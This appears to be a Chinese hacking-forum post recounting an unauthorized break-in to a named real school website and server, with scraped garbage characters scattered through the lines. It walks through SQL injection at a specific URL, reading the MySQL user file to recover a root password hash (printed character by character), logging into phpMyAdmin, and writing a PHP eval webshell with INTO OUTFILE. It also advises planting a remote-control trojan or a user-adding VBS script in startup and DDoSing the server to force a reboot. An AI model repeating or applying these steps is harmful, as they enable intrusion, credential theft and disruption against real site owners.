第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
1 ~4 w) }; E- l# ^3 V& c/ R6 t发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
0 o3 P S+ R# t3 A1 h3 U5 v) a) D5 B& R: j, r8 m% v/ B1 m
8 M& A6 G# N0 x, G2 v
/ P1 J& S* a* P% c$ \7 i/ K; J
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
: n& @* ]+ f+ A5 q2 q* t, K: x( M) [9 j: y; X- D6 B
那么想可以直接写入shell ,getshell有几个条件:. p7 C J4 y4 }
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
\. G6 [" } F5 i. l! E7 h. D) l% V3 l
试着爆绝对路径: % y3 F+ H! l: x* I& z: Y3 s
1./phpMyAdmin/index.php?lang[]=1 . g8 }0 [5 X8 O0 r3 w
2./phpMyAdmin/phpinfo.php # q" o3 E* q: Y% L
3./load_file()
+ g5 t+ Q) \( X: T4./phpmyadmin/themes/darkblue_orange/layout.inc.php % }& r u+ \, i c0 x0 I1 r
5./phpmyadmin/libraries/select_lang.lib.php
1 D! m! X( j L; H# H2 ]6./phpmyadmin/libraries/lect_lang.lib.php
( T1 f( A: X+ X# _3 _! a0 b7./phpmyadmin/libraries/mcrypt.lib.php
0 [. u1 V, O5 q$ H8 ^; k8./phpmyadmin/libraries/export/xls.php 2 Z/ ^& q. Q+ m/ y
1 t2 E) Q0 M6 n1 o) M9 U2 n7 ~均不行........................... 6 I# X; c, N& `7 }& a1 c
3 ?( y9 I1 Y8 l- U2 \$ Z7 `御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php 1 m! {! T( n( u" M0 W" }* y
( d2 v U" {. B* {, T- V. @/ R权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
$ q U3 y3 s0 x( V# Q, ~0 n' p7 G
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
# T/ U) \% e: O$ h1 q8 j
# b: C- Q' w W, n0 |9 e敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
$ Z$ H/ z9 l, K U2 I' E! K
% O. L) p+ y4 r) ^; r想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
) {) l2 F+ T8 k$ a( a3 F
# {5 l! H0 W% J5 v3 D0 h9 g1 R2 zhttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
6 |) l; V/ ^( D, [% n5 d
) a# e3 q; B+ B; i& R0 o! T8 I; [% }自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
. Z8 N+ t G) x7 k2 f0 c
8 Y3 P8 E _4 X0 G成功读到root密码:
5 O3 \+ X# f/ r* ^
- |7 |0 q. U1 H/ Q7 d" g$ `17---- r(0072) 7 _. p0 @( @& ^& g2 X p9 T
18---- o(006f)
4 \8 R0 G8 w. P7 V0 M19---- o(006f)
+ X$ T4 t* x/ G7 r& ^20---- t(0074) ; n7 p' a$ }, p- R* c
21---- *(002a)
3 R( t: X; c( R1 T22---- 8(0038)
# t2 d( b6 l6 a$ K# |2 g/ _23---- 2(0032) + \; _* P9 J. B
24---- E(0045)
+ \2 w" n4 p/ F. o25---- 1(0031) * @, K0 S( T' D' s' f5 J9 a
26---- C(0043) . e% I. {/ e0 n1 @, g
27---- 5(0035) " W A* ~0 B8 } B
28---- 8(0038) ! Y/ K, ?7 U; M3 L% w
29---- 2(0032)
9 N% L' U/ R8 w! |1 C0 J' h30---- 8(0038)
3 b7 j% ]- v7 H( }1 E8 `' _. h, s31---- A(0041) ( { L/ s; c8 _0 n+ P1 m3 W G
32---- 9(0039)
! y. y ]1 _# j n33---- B(0042)
, x6 v$ o8 B! Y2 K34---- 5(0035) ; P+ i7 o1 z: A8 U
35---- 4(0034)
. v0 W7 D% Y5 ^+ C* N2 P36---- 8(0038)
& u, c4 m9 ~' Y) ?' B37---- 6(0036) f T; ? W4 [) Q8 ~4 {! b
38---- 4(0034) ) R9 m0 t8 C9 f e- n0 g
39---- 9(0039)
+ k* u1 w$ j5 }! [40---- 1(0031) 8 G0 S/ D2 D7 \5 X& G% [
41---- 1(0031) 3 d6 H( G' E. H# @, ?
42---- 5(0035) * ~0 A% m5 {4 N, O
43---- 3(0033) . n g0 B& e F5 Q1 H/ A9 Q
44---- 5(0035) 8 y2 z! U' Y+ w" T
45---- 9(0039) 2 F6 J I1 d( }) i1 q
46---- 8(0038) 1 `! ]6 e9 u# T+ x, v$ H* l
47---- F(0046)
9 M$ N) t5 I- Y( F3 `, Q i1 r+ T48---- F(0046)
+ e: T- \6 h- ]49---- 4(0034) + H8 k7 {# d1 x( i$ v* Y
50---- F(0046) E6 I4 s1 c8 u8 O2 ^# y: @
51---- 0(0030) ; B9 p/ ~% O6 y' D) z* f' E6 a
52---- 3(0033)
1 S: |2 e z$ F& h/ B& o53---- 2(0032) , Q- [; `, ?* ^- b2 C* x( b/ j
54---- A(0041) 3 S: X+ B6 i# ^7 `5 f
55---- 4(0034)
' B' f: X& P- x$ P56---- A(0041)
: X7 |: w% u7 @0 U8 U# a57---- B(0042)
% F$ U1 M2 v! R F5 L58---- *(0044)
. Y% |/ b) ~/ q( b1 C59---- *(0035)
' T* [9 u2 l/ J+ b+ b& A3 k& c60---- *(0041) : V% V* R) L# _$ Y a
61---- *0032)
( X! I0 J3 @6 v, M( j; A. c8 m1 l2 d+ n5 ^
解密后成功登陆phpmyamin ) O7 ]* a' @: A+ [ m- N p3 r# d) [
" w/ f8 y; w c- ^
+ }" f+ j! _, f4 W0 T
Q+ ?6 L" Y9 L! p, o
9 v* Q6 L: O5 D/ u# ~
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' " V0 X. h7 @4 [9 Y2 g
& S# y3 l: f# Q2 w x成功执行,拿下shell,菜刀连接:
) [ R6 G) L1 i) q5 E6 V( {* I. B# w/ I/ o
服务器不支持asp,aspx,php提权无果...................
* C8 k3 h% w3 ` e8 Q! C0 }* b% d
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
7 R4 R4 V$ ?7 e; d. w* h5 l服务器上已经有个隐藏帐号了
( p/ P7 t' M' t0 _0 a6 t+ f7 k' @6 n. W别名 administrators B, ^; Q( a* k# x( Y- @/ W
注释 管理员对计算机/域有不受限制的完全访问权 9 h6 @4 n6 m! g! a- G* i: U+ A
成员 . g: m2 m" N1 I# N3 C6 S, o
-------------------------------------------------------------------------------# h) h0 B {$ S1 {
admin
) A6 ]0 |3 P2 fAdministrator
0 a/ Z2 s. q7 a: p) Lslipper$
* p' ]; Q5 ]! @1 D" v+ u) ?, Csqluser
6 ~2 [! C7 o+ @& f/ o命令成功完成。
$ S8 T d1 Z0 F& ]( d
% A9 [4 |& q- `' W8 t服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
6 `8 T9 a3 Z9 p# Q! i
' D8 e; [& O vddos服务器重启,不然就只能坐等服务器重启了...............................1 v t4 `: Q- u/ w1 h# M: Z' Q
1 r0 [6 `# a6 I: C; w ?
7 L' d3 a# J/ y# O+ v
|